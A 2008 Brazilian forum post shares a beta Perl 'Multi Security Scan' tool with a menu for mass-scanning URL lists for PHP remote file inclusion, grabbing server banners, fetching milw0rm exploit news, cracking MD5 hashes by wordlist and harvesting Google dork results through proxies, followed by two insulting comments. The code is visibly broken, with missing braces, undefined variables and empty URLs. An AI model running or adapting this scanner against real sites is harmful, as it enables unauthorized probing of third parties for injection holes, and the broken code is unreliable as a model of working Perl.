Multi Security Scan

Publicado por C00L3R_ 20/08/2008

[ Hits: 7.217 ]



Bem simples, terminei ele estes dias. Ainda irei adicionar mais funções para ficar bacana.

Ainda está em fase beta. xD


Esconder código-fonte

#################################---> Modulos
use Term::ANSIColor;
use HTML::LinkExtor;
use LWP::UserAgent;
use Digest::MD5 qw(md5_hex);
use warnings;
#################################---> Carregando Limpa tela
my $sis="$^O";
if ($sis eq MSWin32) { $cmd="cls"; } else { $cmd="clear"; }
inicio: print `$cmd`;
#################################---> Banner de inicio
my $valor=<STDIN>; chomp $valor;
if ($valor eq 0) { exit; }
if ($valor eq 1) {
#################################---> Variavel responsavel pela CMD
$cmd = "http://";
#################################---> Pegando variaveis do usuario
print "qual nome do arquivo txt que contem as listas para scan,apenas o nome \? \n";
my $lista = <STDIN>; chomp $lista;
print "Se nao quiser proxy coloque 0 \n";
print "Qual o proxy \? exemplo \n";
my $proxy = <STDIN>; chomp $proxy;
#################################---> iniciando constructor de Agent Stealth
$agent = new LWP::UserAgent;
$agent->agent('Mozilla/5.0 (X11; U; Gentoo Linux amd64; en-US; rv: Gecko/20080301 Firefox/');
$agent->cookie_jar( {} );
################################---> Condicao do uso do proxy
if($proxy!=0) {
  $agent->proxy("http", "http://$proxy/");
################################---> iniciando filtro com regex
open (my $injection, "<$lista.txt")|| die "erro em abrir $lista.txt $!\n";
while (<$injection>) {
if ($_ =~ s/$\=.*/=$cmd/mg) {
open(LOG,">>sites.txt"); print LOG "$_"; close(LOG); }
  print "pronto links separados e com CMD injetada\n";
close $injection;
################################---> iniciando Scaner de PHP-injection
print "agora o scan vai procurar sites vulneraveis\n";
open (my $teste, "<sites.txt");
while (<$teste>) {
my $pagina="$_"."?";
my $request = HTTP::Request->new('GET',$pagina);
my $result = $agent->request($request);
my $site = $agent->request($request);               # $result->content();
if ($site->is_success) { if($site->content =~ /owlphp/) {
open (OUT, ">>vuln.txt"); print OUT "$pagina\n"; close(OUT); }}
print "Scan-owl terminado\nabra vuln.txt para ver sites vuln\n"; close($teste);
sleep 3; goto inicio;
################################---> Host predict
if ($valor eq 2) {
print "qual pagina voce quer ver info \?\n";
my $pagin=<STDIN>; chomp $pagin;
my $socket = IO::Socket::INET->new(
                                       PeerAddr => "$pagin",
                                       PeerPort => "80",
                                       Timeout => "7",
                                       Proto => "tcp"
die "Nao foi possivel criar a socket\n" unless $socket;
if ($socket) {
print $socket "GET /index.html HTTP/1.0\r\n\r\n";
while (<$socket>) {
if ($_ =~ /Date:|Server:|squid|system/){
print "$_"; }
my $ip = inet_ntoa(inet_aton($pagin));
print "IP:$ip\n";
sleep 8; goto inicio;
##############################---> novidades do boteco
if ($valor eq 3) {
print "pegando ultimos posts do blog\n";
my $pagi="";
$agent = new LWP::UserAgent;
$request = HTTP::Request->new('GET',$pagi);
$result = $agent->request($request);
@result = $result->content();
print RES @result; close(RES); open(RES,"<","novi.txt");
@texto = <RES>; close(RES); unlink ("novi.txt");
foreach (@texto) {
if ($_ =~ m/<(title|link)>(.*?)<\/(title|link)>/) {
my $nova="$2";
print "$nova\n"; }}
sleep 8; goto inicio;                   
#############################---> novidades milw0rm
if ($valor eq 4) {
  &milworm(); sleep 5; goto inicio;
#############################---> MD5 Crack
if ($valor eq 5) {
print "MD5 crack\n";
print "Author: evolution0x55 \n";
print "Wordlist file? ";

open(FOPEN, $file) or die($file." not found!");

print "\nMD5 Hash? ";
print "\n";

foreach (<FOPEN>){
    if ($line_hash eq $hash){
        print "CRACKED: ".$_;
        exit 0;
    print $_.":".$hash." [FAILED]\n";
print "\n\nHash not cracked.";
sleep 10; goto inicio;

#################################----> Googler
if ($valor eq 6) {
#################################---> Pegando Variaveis do usuario
#unlink resposta.txt;
print "Googler LinkExtor by C00L3R\n";
print "vamos la, Qual string de busca \?\n";
my $string = <STDIN>; chomp $string;
print "Se nao quiser proxy coloque 0 \n";
print "Qual o proxy \? exemplo \n";
my $proxy = <STDIN>; chomp $proxy;
#################################---> iniciando constructor Stealth
my $agent = new LWP::UserAgent;
$agent->agent('Mozilla/5.0 (X11; U; Gentoo Linux amd64; en-US; rv: Gecko/20080301 Firefox/');
$agent->cookie_jar( {} );
#################################---> Ativando Proxy
if($proxy!=0) {
  $agent->proxy("http", "http://$proxy/");
#################################---> Loop de Busca do Google
print "fazendo busca isso pode demorar minutos\n";
for(my $i=10;$i<100;$i+=2) {
my $pa="$string&start=$i";
my $request = HTTP::Request->new('GET',$pa);
my $result = $agent->request($request);
my $resposta = $result->content();
open (OUT, ">>paginas.txt");
print OUT "$resposta\n"; close(OUT);
#################################---> Extraindo Links
eval {
print "paginas pegas agora extraindo os links\n"; sleep 3;
my $parser = HTML::LinkExtor->new;
my @links = $parser->links;
  foreach (@links) {
   print 'Type: ', shift @$_, "\n";
    while (my ($name, $val) = splice(@$_, 0, 2)) {
     print " $name -> $val\n";
       if ($val !~ /videos.*|google.*|groups.*|image.*|www\.google.*|orkut.*|64.*|youtube.*/) {
open (OUT, ">>resposta.txt"); print OUT "$val\n"; close(OUT);
        print "$val\n";
#unlink paginas.txt;
print "Scan Caos Google terminado resultado salvo em resposta.txt\n";

################################--->funcoes diversas
sub milworm() {
@sploits = (); $version = 1.0; $getit = '';
$agent = new LWP::UserAgent; $request = HTTP::Request->new('GET',$getit);
$result = $agent->request($request); $getit =~ s/.*\///;
@result = $result->content(); open(RES,">","mille.txt");
print RES @result; close(RES); open(RES,"<","mille.txt");
@inhalt = <RES>; close(RES); unlink ("mille.txt");
foreach $shit (@inhalt) { $shit =~ tr/</ /; $shit =~ tr/>/ /;
$shit =~ tr/\// /; $shit =~ s/;
if ($shit =~ m/title/i) { $shit =~ s/title/ /ig; push(@sploits,"$shit");
} } print @sploits; }

sub image {
print q{
|| ...    *    .   _  .      *               *        ||
||*  .  *     .   * (_)   *                           ||
||  .      |*  ..   *   ..                            ||
||   .  * \|  * .___.  .. *               *           ||
||*   \/   |/ \/(o,o)     .                      *    ||
||  _\_\   |  / /)  )* _/_ *                          ||
||      \ \| /,--"-"---  ..    *    Coded by C00l3r_  ||
||_-----`  |(,__,__/__/_ .         *                  ||
||       \ ||      ..                 *               ||
||        ||| .            *                          ||
|| *      |||                     *                   ||
||      * |||           *              *              ||
||, -=-~' .-^- _--^----.-.-.-.-^.-.-.-.-.-.-.-.-.-.-  ||
||           `                                        ||
0- Sair
1- Coruja php injectScan 0.1
2- Httpd type Scan
3- BotecoUnix News
4- Milw0rm News
5- MD5 crack
6- Googler LinkExtor term version 0.2
thanks furadordeSyS,r0t3d,b4rtb0y,_mlk_,voidpointer,st4t1c,C0lt7r
my parents and relatives,my friends thanks for all

Scripts recomendados

Script para encontrar vulnerabilidades no BIND

Gerador de senhas aleatórias

Brutal Force Attack

Monitor de portas


[1] Comentário enviado por evolution0x55 em 31/08/2008 - 02:05h

You sir, are absolutely horrible. Get something better to do. You might want to code your own shit next time.


[2] Comentário enviado por Cooler_ em 31/08/2008 - 17:41h

I do not publish the gold but I publish as to use the hammer ...
come of somebody anonymous thing, this is absolutely pathetic, you dude is pathetic , if you make better you show to a program its…

I made this program playing , HAHAHA

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